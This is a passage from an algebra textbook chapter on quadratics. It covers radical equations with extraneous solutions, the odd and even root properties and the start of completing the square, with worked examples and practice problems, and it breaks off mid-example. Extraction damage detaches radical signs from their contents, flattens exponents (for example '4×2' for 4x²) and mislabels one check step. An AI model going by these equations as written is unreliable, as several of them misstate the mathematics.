horizontal, Calculate the time of flight in seconds. (Take g = 9.8ms-2)\n\n(a) 5.2\n\n(b) 2.6\n\n(c) 0.3\n\n(d) 0.15\n\nSECTION B — THEORY\n\nAnswer all Questions in this section.\n\nQUESTION 1\n\na. List 4 differences between heat and temperature.\n\nb. List 4 types of thermometers, stating the thermometric substance each is using.\n\nc. List 4 advantages of using mercury over alcohol as a thermometric substance.\n\nd. Convert:\n\ni. 80oC, -30°C to oF and Kelvin respectively\n\nii. -40oF, 70°F to oC and Kelvin respectively\n\nQUESTION 2\n\na. Define the following:\n\ni. Specific Heat Capacity\n\nii. Specific Latent Heat\n\nb. With a well Labeled diagram, Explain how you can determine the specific heat capacity of a substance through electrical method.\n\nQUESTION 3\n\na. Assuming that the S.H.C of water is 4180j/kg/k, how long will it take to heat 3kg of water from 28oC to 88oC, using electric kettle which taps 6A from 220V supply?\n\nb. An electric heater is used in heating 100g of water from 50oC to 100oC,. Calculate the time, t, during which the current flowed. Neglect the S.H.C of the calorimeter, assume that the S.H.C of water is 4200j/kg/k, and the power of heater is 50W.\n\n### SSS 2 CHEMISTRY\n\nSECTION A\n\nInstruction: Fill the gaps with the most suitable word from the options A – D.\n\n1. Flow of current in electrolytes is due to the movement of\n\n(a) Electrons\n\n(b) Holes and Electrons\n\n(c) Ions\n\n(d) Charges\n\n2. What quantity of electricity was consumed when 10A was consumed in 1hr during Electrolysis.\n\n(a) 36KC\n\n(b) 3600C\n\n(c) 7200C\n\n(d) 72KC\n\n3. Calculate the mass of aluminium deposited when a current of 3.0A is passed through an aluminium electrolyte for 2hrs.\n\n(a) 1.0g\n\n(b) 6.04g\n\n(c) 4.04g\n\n(d) 2.02g\n\n(Al = 27, 1F = 96500)\n\n4. One faraday is equal to _________.\n\n(a) 9650C\n\n(b) 96500C\n\n(c) one mole of electron\n\n(d) 965C\n\nRelevant link – Second Term Examination Chemistry SS 1\n\n5. Rate of reactions depends on the following factors except:\n\n(a) Rate at which gas is evolved.\n\n(b) Rate at which colour of reactions change.\n\n(c) Rate at which products are formed.\n\n(d) Rate at which the reactants diminish.\n\n6. The unit of rate of a chemical reaction is:\n\n(a) Moldm-3S-1\n\n(b) Mol-1S-1\n\n(c) Mol-1\n\n(d) SMol-1\n\n7. If 2g of zinc granules was reacted with excess dilute HCL to evolve hydrogen gas which came to completion after 5 mins. Calculate the rate of the chemical reaction in ghr-¹.\n\n(a) 48ghr-¹\n\n(b) 12ghr-¹\n\n(c) 24ghr-¹\n\n(d) 240ghr-¹\n\n8. The minimum or critical amount of energy required before a chemical reaction could occur Is called _________.\n\n(a) Reaction Energy\n\n(b) Effective Collision\n\n(c) Activation energy\n\n(d) Minimum Energy\n\n9. Reaction occurs when the colliding reactant particles _________.\n\n(a) Have energy less then the energy barrier.\n\n(b) have energy equal or greater than the energy barrier.\n\n(c) have energy less than the effective collision.\n\n(d) have energy greater than that of the products.\n\n10. These are factors affecting chemical reactions except _________.\n\n(a) surface Area\n\n(b) catalyst\n\n(c) nature of the Reactants\n\n(d) activating Energy\n\n11. Two boys balanced steady in a see-saw game is an example of _________.\n\n(a) Static Equilibrium\n\n(b) dynamic Equilibrium\n\n(c) Homogenous Equilibrium\n\n(d) Mutual Equilibrium\n\n12. Factors affecting Equilibrium reactions includes the following except ________________.\n\n(a) Pressure for solids\n\n(b) Concentration\n\n(c) Temperature\n\n(d) Pressure for gases\n\n13. In most Equilibrium reactions, catalyst is not required because _________.\n\n(a) Catalyst reduces the energy barrier\n\n(b) Most catalyst are easily poisoned when wrongly chosen\n\n(c) Catalyst favours both forward and backward reactions\n\n(d) Catalyst could be positive or Negative\n\n14. The Phenomenon whereby the atmospheric pressure is equal to the Saturated vapour pressure is called _________.\n\n(a) Freezing\n\n(b) Latent Heat\n\n(c) Boiling\n\n(d) Normal Pressure\n\n15. What is the chemical Formular for Manganese?\n\n(a) Mn\n\n(b) Mn\n\n(c) mN\n\n(d) MN\n\nSECTION B — THEORY\n\nAnswer all Questions in this section.\n\nQUESTIONS 1\n\na. What is rate of Reaction?\n\nb. List 5 ways of determining rates of reaction.\n\nc. Explain comprehensively what you understand by ‘Collision Theory’.\n\nd. List and Explain 5 factors that affects the rates of a reaction.\n\nQUESTION 2\n\na. Explain comprehensively ‘Chemical Equilibrium’\n\nb. List 5 Properties(characteristics) of a system existing in chemical equilibrium\n\nc. Explain ‘Equilibrium in reversible reaction’.\n\nQUESTION 3\n\na. State Le Chatlier’s Principle\n\nb. List and explain fully the conditions at which equilibrium state is dependent on.\n\nSS 3 Chemistry and Physics are work in progress…\n\n### SSS 3 PHYSICAL\n\nSECTION A\n\nInstruction: Fill the gaps with the most suitable word from the options A – D.\n\nSECTION A" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.81069636,"math_prob":0.9611094,"size":15707,"snap":"2023-14-2023-23","text_gpt3_token_len":4428,"char_repetition_ratio":0.12647265,"word_repetition_ratio":0.07541697,"special_character_ratio":0.28350416,"punctuation_ratio":0.11923439,"nsfw_num_words":4,"has_unicode_error":false,"math_prob_llama3":0.9807263,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-28T18:23:53Z\",\"WARC-Record-ID\":\"<urn:uuid:91d5da8b-a242-4ec5-a9d0-e1c0165a2896>\",\"Content-Length\":\"140220\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4c65f5a9-c6a2-4afa-b9d5-2596957ba02b>\",\"WARC-Concurrent-To\":\"<urn:uuid:2eee2a0e-571a-43e1-909e-adb6f132c046>\",\"WARC-IP-Address\":\"172.67.205.8\",\"WARC-Target-URI\":\"https://classbasic.com/second-term-examination-physics-and-chemistry-for-ss-1-ss-3-term-2-exam-questions/\",\"WARC-Payload-Digest\":\"sha1:MPFOV4VD6C474EYWCM3ZD4Y2KUDH2M5F\",\"WARC-Block-Digest\":\"sha1:QPLR2OB5NC43OU3YYBT5WV5TQZ62NAO7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296948868.90_warc_CC-MAIN-20230328170730-20230328200730-00373.warc.gz\"}"}
http://www.stfmc.de/fmc/rhs/x/wchf.shtml?tp112.apm
[ "### tp112.apm\n\n```Model tp112\n! Source version 1\n\nParameters\nb3a = -1 ! from PROB.FOR\nb3b = 0 ! from H+S, seems to be a typo\nb3 = b3a ! my quite clear decision, b3b yields FPE\nc[ 1] = -6.089\nc[ 2] = -17.164\nc[ 3] = -34.054\nc[ 4] = -5.914\nc[ 5] = -24.721\nc[ 6] = -14.986\nc[ 7] = -24.100\nc[ 8] = -10.708\nc[ 9] = -26.662\nc = -22.179\nsi = 0\nso = 0\nEnd Parameters\n\nVariables\nx[1:10] = 0.1, >= 1.0e-6\nobj\nEnd Variables\n\nIntermediates\ncf = x + 2*x + 2*x + x + x - 2\ncf = x + 2*x + x + x - 1\ncf = x + x + x + 2*x + x + b3\nsi[1:10] = si[0:9] + x[1:10]\naux = si\nso[1:10] = so[0:9] &\n+ x[1:10]*(c[1:10] + log(x[1:10]/aux))\nmf = so\nEnd Intermediates\n\nEquations\ncf[1:3] = 0\n\nobj = mf\n\n! best known objective = -47.76109085936586\n! begin of best known solution\n! x[ 1] = 0.04066808735569023\n! x[ 2] = 0.1477303543408223\n! x[ 3] = 0.7831533540092339\n! x[ 4] = 0.001414219809030122\n! x[ 5] = 0.485246648699273\n! x[ 6] = 0.0006931720784207306\n! x[ 7] = 0.02739931071400318\n! x[ 8] = 0.01794727958492589\n! x[ 9] = 0.03731436591303018\n! x = 0.09687132386577663\n! end of best known solution\nEnd Equations\nEnd Model\n```\n\nStephan K.H. Seidl" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5054636,"math_prob":0.9999963,"size":1174,"snap":"2023-40-2023-50","text_gpt3_token_len":630,"char_repetition_ratio":0.14529915,"word_repetition_ratio":0.0,"special_character_ratio":0.6950596,"punctuation_ratio":0.19322033,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9996792,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-28T10:32:16Z\",\"WARC-Record-ID\":\"<urn:uuid:761089ab-1afc-49e2-bb10-d87616ee5a66>\",\"Content-Length\":\"2344\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8cc710b7-a05f-430c-be87-f7ca8495f59a>\",\"WARC-Concurrent-To\":\"<urn:uuid:3c204913-d1bd-4249-a2ce-aca73c8e7a93>\",\"WARC-IP-Address\":\"81.169.145.79\",\"WARC-Target-URI\":\"http://www.stfmc.de/fmc/rhs/x/wchf.shtml?tp112.apm\",\"WARC-Payload-Digest\":\"sha1:3CLH2X7AMA2YBMR3MMH7AVN66IDSEOPL\",\"WARC-Block-Digest\":\"sha1:6RRSRCD7FMYRA6S76HWYA4GKEGGALYNU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679099281.67_warc_CC-MAIN-20231128083443-20231128113443-00756.warc.gz\"}"}
https://devsolus.com/tag/sum/
[ "# sum by row accros columns and conditions\n\nI have a dataframe with ninety columns (in the example only 6) and multiple rows. I would like to sum by rows on all the columns but only when the value is 4 or 5. In the results I would like the number of time the conditions is realised. I don’t know how to add… Read More sum by row accros columns and conditions\n\n# Find the sum of all numbers entered\n\nI need to read the number inputs from the user until they type in 0, print the sum of all entered number. I am hoping to get this response: Enter n: 50 Enter n: 25 Enter n: 10 Enter n: 0 total=85 So far my code is (sorry for my variables): char ya; float tem,… Read More Find the sum of all numbers entered\n\n# i have to sum the numbers like sum of 55555 is 25 and sum 0f 25 is 7 ,but we have to use while loop specifically to solve it?\n\nI have to sum the numbers like sum of 55555 is 25 and sum of 25 is 7, but we have to use while loop specifically to solve it function createCheckDigit(membershipId) { string = membershipId.split(”); let sum = 0; for (var i = 0; i \\< string.length; i++) { sum += parseInt(string\\[i\\],10); } return sum… Read More i have to sum the numbers like sum of 55555 is 25 and sum 0f 25 is 7 ,but we have to use while loop specifically to solve it?\n\n# What do i have to do if i want to Sum my result using Python?\n\nimport string dict = {} bool = False user_string = input(\"Bitte gebe hier die Buchstaben ein, welche du Summieren möchtest:\") String_Num = \"\" for i, char in enumerate(string.ascii_lowercase): dict[i] = char # This is dictinoary. for val in user_string.lower(): if(val.isdigit()): print(\"Entschuldige, der Vorgang konnte nicht abgeschlossen werden!\") bool = True break for key, value in… Read More What do i have to do if i want to Sum my result using Python?\n\n# How to sum the values of specific keys while iterating over a dictionary in python?\n\nCreate a solution that accepts an integer input identifying how many shares of stock are to be purchased from the Old Town Stock Exchange, followed by an equivalent number of string inputs representing the stock selections. The following dictionary stock lists available stock selections as the key with the cost per selection as the value.… Read More How to sum the values of specific keys while iterating over a dictionary in python?\n\n# How to stack summing vectors to numpy 3d array?\n\nI have a 3d numpy array that looks like so: >>> g array([[[ 1., 1., 1., 1., 1.], [ 0., 0., 0., 0., 0.], [ 1., 2., 3., 4., 6.]], [[ 0., 0., 0., 0., 0.], [11., 22., 33., 44., 66.], [ 0., 0., 0., 0., 0.]]]) I know I can calculate a sum along… Read More How to stack summing vectors to numpy 3d array?\n\n# How to count how many times a word in a list appeared in-another list\n\nI have 2 lists and I want to see how many of the text in list 1 is in list 2 but I don’t really know of a way to like combine them the output isn’t summed and I have tried sum method but it does it for all words counted not each word. Code:… Read More How to count how many times a word in a list appeared in-another list\n\n# Is it possible to summarize or group every row with a specific column value? – python\n\nPicture of my dataframe Is it possible to summarize or group every country’s info to something like a ‘total info’ row This df is fluent, it will change each month and having a \"quick access\" view of how it looks will be very beneficial. Take the picture as example: I would like to have Albania’s… Read More Is it possible to summarize or group every row with a specific column value? – python\n\n# Python: sum column for every dataframe in a list\n\nI have a list of identical dataframes and I am trying to sum one column in each dataframe in the list. My thought is something like total = [df[‘A’].sum for df in dfs] but this returns a list of length dfs containing only the value method. My desired output is a list of the column… Read More Python: sum column for every dataframe in a list\n\n# What's wrong with the C code below?(A trivial one)\n\nWhen you run the C code below, you get a different results almost everytime(None of them are altogether correct). #include <stdio.h> #include <stdlib.h> int main() { int i,j; int s={{202201,90,13,21},{202202,32,24,12},{202203,23,53,76},{202204,21,43,64},{202205,12,45,89},{202206,98,99,100},{202207,12,0,0},{202208,0,0,0},{202209,98,12,34},{202210,23,65,34}}; int ave,sum; printf(\"No. MA EN CN\\n\"); for(i=0;i<10;i++) { for(j=0;j<4;j++) printf(\"%4d\",s[i][j]); printf(\"\\n\"); } for(i=0;i<10;i++) { for(j=1;j<4;j++) sum[i]=s[i][j]+sum[i]; printf(\"%d\\n\",sum[i]); } return 0; } What’s happening? What’s the… Read More What's wrong with the C code below?(A trivial one)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9304009,"math_prob":0.9472186,"size":355,"snap":"2023-14-2023-23","text_gpt3_token_len":84,"char_repetition_ratio":0.15954416,"word_repetition_ratio":0.08955224,"special_character_ratio":0.22535211,"punctuation_ratio":0.04,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9900139,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-31T03:41:59Z\",\"WARC-Record-ID\":\"<urn:uuid:ac8352bb-cd5c-4a14-9259-34c9a000eb9f>\",\"Content-Length\":\"81906\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fe5b25aa-3168-4643-9ec2-b20461c6e43d>\",\"WARC-Concurrent-To\":\"<urn:uuid:672c84b3-8ac0-4103-addd-bcef6330c696>\",\"WARC-IP-Address\":\"192.0.78.160\",\"WARC-Target-URI\":\"https://devsolus.com/tag/sum/\",\"WARC-Payload-Digest\":\"sha1:LXF3CQ75UNOTJJ4ENBN3UZVG4VGVYNZ4\",\"WARC-Block-Digest\":\"sha1:ST5WDQODLS6MAAGQV56KTH4NBLXRMKP3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949533.16_warc_CC-MAIN-20230331020535-20230331050535-00076.warc.gz\"}"}
https://gishomework.com/one-algebra-problem/
[ "# One Algebra Problem\n\nChapter 9, “Quadratics” from Beginning and Intermediate Algebra by Tyler Wallace is available under a Creative Commons Attribution 3.0 Unported license. © 2010.\n\nhttp://www.wallace.ccfaculty.org/book/book.html\n\n9.1\n\nObjective: Solve equations with radicals and check for extraneous solu- tions.\n\nHere we look at equations that have roots in the problem. As you might expect, to clear a root we can raise both sides to an exponent. So to clear a square root we can rise both sides to the second power. To clear a cubed root we can raise both sides to a third power. There is one catch to solving a problem with roots in it, sometimes we end up with solutions that do not actually work in the equation. This will only happen if the index on the root is even, and it will not happen all the time. So for these problems it will be required that we check our answer in the original problem. If a value does not work it is called an extraneous solution and not included in the final solution.\n\nExample 442.\n\n7x + 2 √\n\n= 4 Even index!Wewill have to check answers\n\n( 7x+ 2 √\n\n)2 =42 Square both sides, simplify exponents\n\n7x + 2= 16 Solve\n\n− 2 − 2 Subtract 2 fromboth sides 7x = 14 Divide both sides by 7\n\n7 7\n\nx = 2 Need to check answer in original problem\n\n7(2)+ 2 √\n\n= 4 Multiply\n\n14+ 2 √\n\n16 √\n\n= 4 Square root\n\n4= 4 True! It works!\n\nx = 2 Our Solution\n\nExample 443.\n\nx− 13 √\n\n=− 4 Odd index,we don′t need to check answer ( x− 13 √\n\n)3 =(− 4)3 Cube both sides, simplify exponents x− 1 =− 64 Solve\n\n326\n\n+ 1 +1 Add 1 to both sides\n\nx =− 63 Our Solution\n\nExample 444.\n\n3x +64 √\n\n=− 3 Even index!Wewill have to check answers ( 3x +64 √\n\n) = (− 3)4 Rise both sides to fourth power 3x +6 = 81 Solve\n\n− 6 − 6 Subtract 6 fromboth sides 3x = 75 Divide both sides by 3\n\n3 3\n\nx = 25 Need to check answer in original problem\n\n3(25) + 64 √\n\n=− 3 Multiply 75+64\n\n814 √\n\n=− 3 Take root 3 =− 3 False, extraneous solution\n\nNo Solution Our Solution\n\nIf the radical is not alone on one side of the equation we will have to solve for the radical before we raise it to an exponent\n\nExample 445.\n\nx + 4x +1 √\n\n= 5 Even index!Wewill have to check solutions\n\n− x −x Isolate radical by subtracting x fromboth sides 4x +1\n\n√ = 5−x Square both sides\n\n( 4x+ 1 √\n\n)2 =(5− x)2 Evaluate exponents, recal (a− b)2 = a2− 2ab + b2 4x +1 = 25− 10x + x2 Re− order terms 4x +1 =x2− 10x + 25 Make equation equal zero\n\n− 4x− 1 − 4x − 1 Subtract 4x and 1 fromboth sides 0 =x2− 14x + 24 Factor\n\n0= (x− 12)(x− 2) Set each factor equal to zero x− 12=0 or x− 2= 0 Solve each equation + 12+ 12 +2+ 2\n\nx = 12 or x = 2 Need to check answers in original problem\n\n(12) + 4(12) + 1 √\n\n= 5 Checkx =5first\n\n327\n\n12+ 48+1 √\n\n12+ 49 √\n\n= 5 Take root\n\n19= 5 False, extraneous root\n\n(2) + 4(2) +1 √\n\n= 5 Checkx =2\n\n2+ 8 +1 √\n\n2+ 9 √\n\n= 5 Take root\n\n5= 5 True! Itworks\n\nx = 2 Our Solution\n\nThe above example illustrates that as we solve we could end up with an x2 term or a quadratic. In this case we remember to set the equation to zero and solve by factoring. We will have to check both solutions if the index in the problem was even. Sometimes both values work, sometimes only one, and sometimes neither works.\n\nWorld View Note: The babylonians were the first known culture to solve quadratics in radicals – as early as 2000 BC!\n\nIf there is more than one square root in a problem we will clear the roots one at a time. This means we must first isolate one of them before we square both sides.\n\nExample 446.\n\n3x− 8 √\n\n− x√ =0 Even index!Wewill have to check answers + x √\n\n+ x √\n\nIsolate first root by adding x √\n\nto both sides\n\n3x− 8 √\n\n= x √\n\nSquare both sides\n\n( 3x− 8 √\n\n)2 = ( x √\n\n)2 Evaluate exponents\n\n3x− 8= x Solve − 3x − 3x Subtract 3x fromboth sides − 8=− 2x Divide both sides by− 2 − 2 − 2\n\n4= x Need to check answer in original\n\n3(4)− 8 √\n\n− 4 √\n\n=0 Multiply\n\n12− 8 √\n\n− 4 √\n\n=0 Subtract\n\n4 √\n\n− 4 √\n\n=0 Take roots\n\n328\n\n2− 2=0 Subtract 0=0 True! It works\n\nx =4 Our Solution\n\nWhen there is more than one square root in the problem, after isolating one root and squaring both sides we may still have a root remaining in the problem. In this case we will again isolate the term with the second root and square both sides. When isolating, we will isolate the term with the square root. This means the square root can be multiplied by a number after isolating.\n\nExample 447.\n\n2x + 1 √\n\n− x√ = 1 Even index!Wewill have to check answers + x √\n\n+ x √\n\nIsolate first root by adding x √\n\nto both sides\n\n2x +1 √\n\n= x √\n\n+ 1 Square both sides\n\n( 2x +1 √\n\n)2 = ( x √\n\n+1)2 Evaluate exponents, recall (a + b)2 = a2 +2ab+ b2\n\n2x +1= x +2 x √\n\n+ 1 Isolate the termwith the root\n\n−x− 1−x − 1 Subtract x and 1 fromboth sides x =2 x\n\n√ Square both sides\n\n(x)2 =(2 x √\n\n)2 Evaluate exponents\n\nx2 =4x Make equation equal zero\n\n− 4x− 4x Subtract x fromboth sides x2− 4x= 0 Factor\n\nx(x− 4)= 0 Set each factor equal to zero x =0 or x− 4= 0 Solve\n\n+4+ 4 Add 4 to both sides of second equation\n\nx = 0 or x= 4 Need to check answers in original\n\n2(0)+ 1 √\n\n− (0) √\n\n= 1 Checkx =0first\n\n1 √\n\n− 0 √\n\n= 1 Take roots\n\n1− 0= 1 Subtract 1= 1 True! Itworks\n\n2(4)+ 1 √\n\n− (4) √\n\n= 1 Checkx =4\n\n8+ 1 √\n\n− 4 √\n\n9 √\n\n− 4 √\n\n= 1 Take roots\n\n3− 2= 1 Subtract 1= 1 True! Itworks\n\n329\n\nx =0 or 4 Our Solution\n\nExample 448.\n\n3x + 9 √\n\n− x + 4 √\n\n=− 1 Even index!Wewill have to check answers + x +4 √\n\n+ x + 4 √\n\nIsolate the first root by adding x + 4 √\n\n3x + 9 √\n\n= x +4 √\n\n− 1 Square both sides ( 3x + 9 √\n\n)2 =( x + 4 √\n\n− 1)2 Evaluate exponents 3x + 9=x + 4− 2 x +4\n\n√ + 1 Combine like terms\n\n3x +9 =x + 5− 2 x + 4 √\n\n−x− 5−x− 5 Subtractx and 5 fromboth sides 2x +4=− 2 x + 4\n\n√ Square both sides\n\n(2x + 4)2 =(− 2 x +4 √\n\n)2 Evaluate exponents\n\n4×2 + 16x + 16=4(x + 4) Distribute\n\n4×2 + 16x + 16=4x + 16 Make equation equal zero\n\n− 4x− 16− 4x− 16 Subtract 4x and 16 fromboth sides 4×2 + 12x = 0 Factor\n\n4x(x + 3)= 0 Set each factor equal to zero\n\n4x = 0 or x +3= 0 Solve\n\n4 4 − 3− 3 x =0 or x =− 3 Check solutions in original\n\n3(0)+ 9 √\n\n− (0)+ 4 √\n\n=− 1 Checkx= 0first 9\n\n√ − 4 √\n\n=− 1 Take roots 3− 2=− 1 Subtract\n\n1=− 1 False, extraneous solution\n\n3(− 3) +9 √\n\n− (− 3)+ 4 √\n\n=− 1 Checkx=− 3 − 9+9\n\n√ − (− 3)+ 4 √\n\n√ − 1 √\n\n=− 1 Take roots 0− 1=− 1 Subtract − 1=− 1 True! Itworks\n\nx =− 3 Our Solution\n\n330\n\n9.1 Practice – Solving with Radicals\n\nSolve.\n\n1) 2x + 3 √\n\n− 3= 0\n\n3) 6x− 5 √\n\n− x =0\n\n5) 3+ x= 6x + 13 √\n\n7) 3− 3x √\n\n− 1 =2x\n\n9) 4x + 5 √\n\n− x + 4 √\n\n=2\n\n11) 2x +4 √\n\n− x + 3 √\n\n=1\n\n13) 2x +6 √\n\n− x + 4 √\n\n=1\n\n15) 6− 2x √\n\n− 2x +3 √\n\n= 3\n\n2) 5x +1 √\n\n− 4= 0\n\n4) x + 2 √\n\n− x√ = 2\n\n6) x− 1= 7−x √\n\n8) 2x +2 √\n\n=3 + 2x− 1 √\n\n10) 3x +4 √\n\n− x + 2 √\n\n=2\n\n12) 7x +2 √\n\n− 3x + 6 √\n\n=6\n\n14) 4x− 3 √\n\n− 3x +1 √\n\n= 1\n\n16) 2− 3x √\n\n− 3x +7 √\n\n= 3\n\n331\n\n9.2\n\nObjective: Solve equations with exponents using the odd root property and the even root property.\n\nAnother type of equation we can solve is one with exponents. As you might expect we can clear exponents by using roots. This is done with very few unex- pected results when the exponent is odd. We solve these problems very straight forward using the odd root property\n\nOddRootProperty: if an = b, then a = b n √\n\nwhenn is odd\n\nExample 449.\n\nx5 = 32 Use odd root property\n\nx5 5 √\n\n= 325 √\n\nSimplify roots\n\nx =2 Our Solution\n\nHowever, when the exponent is even we will have two results from taking an even root of both sides. One will be positive and one will be negative. This is because both 32 = 9 and (− 3)2 = 9. so when solving x2 = 9 we will have two solutions, one positive and one negative: x = 3 and− 3\n\nEvenRoot Property: if an = b, thena = ± bn √\n\nwhenn is even\n\nExample 450.\n\nx4 = 16 Use even root property (± )\n\n332\n\nx4 4 √\n\n=± 164 √\n\nSimplify roots\n\nx =± 2 Our Solution\n\nWorld View Note: In 1545, French Mathematicain Gerolamo Cardano pub- lished his book The Great Art, or the Rules of Algebra which included the solu- tion of an equation with a fourth power, but it was considered absurd by many to take a quantity to the fourth power because there are only three dimensions!\n\nExample 451.\n\n(2x + 4)2 = 36 Use even root property (± ) (2x +4)2\n\n=± 36 √\n\nSimplify roots\n\n2x + 4=± 6 To avoid sign errors we need two equations 2x + 4= 6 or 2x + 4=− 6 One equation for+ , one equation for− − 4− 4 − 4 − 4 Subtract 4 fromboth sides\n\n2x =2 or 2x =− 10 Divide both sides by 2 2 2 2 2\n\nx =1 or x =− 5 Our Solutions\n\nIn the previous example we needed two equations to simplify because when we took the root, our solutions were two rational numbers, 6 and− 6. If the roots did not simplify to rational numbers we can keep the ± in the equation.\n\nExample 452.\n\n(6x− 9)2 = 45 Use even root property (± ) (6x− 9)2\n\n=± 45 √\n\nSimplify roots\n\n6x− 9=± 3 5 √\n\nUse one equation because root did not simplify to rational\n\n+ 9 + 9 Add 9 to both sides\n\n6x = 9± 3 5 √\n\nDivide both sides by 6\n\n6 6\n\nx = 9± 3 5\n\n6 Simplify, divide each termby 3\n\nx = 3± 5\n\n2 Our Solution\n\n333\n\nWhen solving with exponents, it is important to first isolate the part with the exponent before taking any roots.\n\nExample 453.\n\n(x +4)3− 6= 119 Isolate part with exponent + 6 +6\n\n(x +4)3 = 125 Use odd root property\n\n(x +4)33 √\n\n= 125 √\n\nSimplify roots\n\nx + 4=5 Solve\n\n− 4− 4 Subtract 4 fromboth sides x =1 Our Solution\n\nExample 454.\n\n(6x +1)2 +6 = 10 Isolate partwith exponent\n\n− 6− 6 Subtract 6 fromboth sides (6x + 1)2 =4 Use even root property (± )\n\n(6x +1)2 √\n\n=± 4 √\n\nSimplify roots\n\n6x +1 =± 2 To avoid sign errors,weneed two equations 6x +1 =2 or 6x +1 =− 2 Solve each equation\n\n− 1− 1 − 1 − 1 Subtract 1 fromboth sides 6x = 1 or 6x =− 3 Divide both sides by 6 6 6 6 6\n\nx = 1\n\n6 or x =− 1\n\n2 Our Solution\n\nWhen our exponents are a fraction we will need to first convert the fractional\n\nexponent into a radical expression to solve. Recall that a m\n\nn = ( an √\n\n) m\n\n. Once we\n\nhave done this we can clear the exponent using either the even ( ± ) or odd root property. Then we can clear the radical by raising both sides to an exponent (remember to check answers if the index is even).\n\nExample 455.\n\n(4x +1) 2\n\n5 = 9 Rewrite as a radical expression\n\n( 4x + 15 √\n\n)2 = 9 Clear exponent first with even root property (± ) ( 4x +15 √\n\n)2 √\n\n=± 9 √\n\nSimplify roots\n\n334\n\n4x +15 √\n\n=± 3 Clear radical by raising both sides to 5th power ( 4x + 15 √\n\n)5 = (± 3)5 Simplify exponents 4x +1=± 243 Solve, need 2 equations!\n\n4x +1= 243 or 4x +1=− 243 − 1 − 1 − 1 − 1 Subtract 1 fromboth sides\n\n4x = 242 or 4x=− 244 Divide both sides by 4 4 4 4 4\n\nx = 121\n\n2 ,− 61 Our Solution\n\nExample 456.\n\n(3x− 2) 3\n\n4 = 64 Rewrite as radical expression\n\n( 3x− 24 √\n\n)3 = 64 Clear exponent firstwith odd root property\n\n( 3x− 24 √\n\n)33 √\n\n= 643 √\n\nSimplify roots\n\n3x− 24 √\n\n( 3x− 24 √\n\n)4 =44 Raise both sides to 4th power\n\n3x− 2= 256 Solve + 2 + 2 Add 2 to both sides\n\n3x = 258 Divide both sides by 3\n\n3 3\n\nx = 86 Need to check answer in radical form of problem\n\n( 3(86)− 24 √\n\n)3 = 64 Multiply\n\n( 258− 24 √\n\n)3 = 64 Subtract\n\n( 2564 √\n\n)3 = 64 Evaluate root\n\n43 = 64 Evaluate exponent\n\n64= 64 True! It works\n\nx = 86 Our Solution\n\nWith rational exponents it is very helpful to convert to radical form to be able to see if we need a ± because we used the even root property, or to see if we need to check our answer because there was an even root in the problem. When checking we will usually want to check in the radical form as it will be easier to evaluate.\n\n335\n\n9.2 Practice – Solving with Exponents\n\nSolve.\n\n1) x2 = 75\n\n3) x2 + 5= 13\n\n5) 3×2 + 1= 73\n\n7) (x +2)5 =− 243\n\n9) (2x +5)3− 6= 21\n\n11) (x− 1) 2\n\n3 = 16\n\n13) (2−x) 3\n\n2 = 27\n\n15) (2x− 3) 2\n\n3 = 4\n\n17) (x + 1\n\n2 ) − 2\n\n3 =4\n\n19) (x− 1)− 5\n\n2 = 32\n\n21) (3x− 2) 4\n\n5 = 16\n\n23) (4x +2) 3\n\n5 =− 8\n\n2) x3 =− 8\n\n4) 4×3− 2= 106\n\n6) (x− 4)2 = 49\n\n8) (5x +1)4 = 16\n\n10) (2x +1)2 +3 = 21\n\n12) (x− 1) 3\n\n2 = 8\n\n14) (2x +3) 4\n\n3 = 16\n\n16) (x +3) − 1\n\n3 = 4\n\n18) (x− 1)− 5\n\n3 = 32\n\n20) (x +3) 3\n\n2 =− 8\n\n22) (2x +3) 3\n\n2 = 27\n\n24) (3− 2x) 4\n\n3 =− 81\n\n336\n\n9.3\n\nObjective: Solve quadratic equations by completing the square.\n\nWhen solving quadratic equations in the past we have used factoring to solve for our variable. This is exactly what is done in the next example.\n\nExample 457.\n\nx2 + 5x +6= 0 Factor\n\n(x + 3)(x +2)= 0 Set each factor equal to zero\n\nx + 3=0 or x +2= 0 Solve each equation\n\n− 3− 3 − 2− 2 x =− 3 or x =− 2 Our Solutions\n\nHowever, the problem with factoring is all equations cannot be factored. Consider the following equation: x2 − 2x − 7 = 0. The equation cannot be factored, however there are two solutions to this equation, 1 + 2 2\n\n√ and 1 − 2 2\n\n√ . To find these two\n\nsolutions we will use a method known as completing the square. When completing the square we will change the quadratic into a perfect square which can easily be solved with the square root property. The next example reviews the square root property.\n\nExample 458.\n\n(x +5)2 = 18 Square root of both sides\n\n(x + 5)2 √\n\n=± 18 √\n\nx +5 =± 3 2 √\n\nSubtract 5 fromboth sides\n\n− 5 − 5 x =− 5± 3 2\n\n√ Our Solution\n\n337\n\nTo complete the square, or make our problem into the form of the previous example, we will be searching for the third term in a trinomial. If a quadratic is of the form x2 + bx + c, and a perfect square, the third term, c, can be easily\n\nfound by the formula (\n\n1\n\n2 · b )2\n\n. This is shown in the following examples, where we\n\nfind the number that completes the square and then factor the perfect square.\n\nExample 459.\n\nx2 +8x + c c =\n\n(\n\n1\n\n2 · b )2\n\nand our b 